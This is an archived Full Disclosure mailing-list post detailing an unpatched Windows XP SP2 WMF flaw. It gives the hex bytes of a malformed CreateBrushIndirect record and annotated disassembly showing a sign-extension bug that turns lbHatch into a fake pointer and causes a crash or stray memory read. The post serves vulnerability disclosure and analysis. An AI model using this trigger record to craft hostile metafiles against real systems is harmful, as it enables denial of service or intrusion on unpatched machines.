Full Disclosure mailing list archives
0-day XP SP2 wmf exploit (some details)
From: cyanid-E <biz4rre () gmail com>
Date: Mon, 7 Aug 2006 03:34:29 +0400
There is some details for wannabees :) 1. 'Bad' wmf record: 07 00 00 00 length of record (in words) FC 02 type (CreateBrushIndirect) 08 00 00 00 00 00 00 80 'packed' (good old Win16 days) LOGBRUSH data: 08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8]) 00 00 00 00 - COLORREF (any) 00 80 - 'packed' lbHatch (any, signed) 2. Sign extension bug: _CommonEnumMetaFile: ...... ; normalize 'packed' LOGBRUSH movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16)) mov [ebp-0f8], eax mov eax, [ebx + 8] ; COLORREF (as is) mov [ebp-0f4], eax movsx eax, word ptr [ebx+0c] ; <-- BUGBUG: lbHatch (UINT32(INT16)) lea eax, [ebp-0f8] push eax call _CreateBrushIndirect ...... 3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug: cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle jz _go2crush ...... cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle jz _go2crush ...... _go2crush: push esi push 1 push eax, [ebp+10] push eax push dword ptr [ebp+0c] ; 1 push dword ptr [ebp+18] ; lpHatch (fake *packedDIB) call _pbmiConvertInfo ...... ...... _pbmiConvertInfo: ...... push ebx mov ebx, [ebp+8] ; lpHatch (fake *packedDIB) ...... mov eax, [ebx] ; <-- BUGBUG: crush or random (in first 0x7f00 bytes) ; memory access (see @ 0x3000 region) good luck, cyanid-E _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- 0-day XP SP2 wmf exploit (some details) cyanid-E (Aug 06)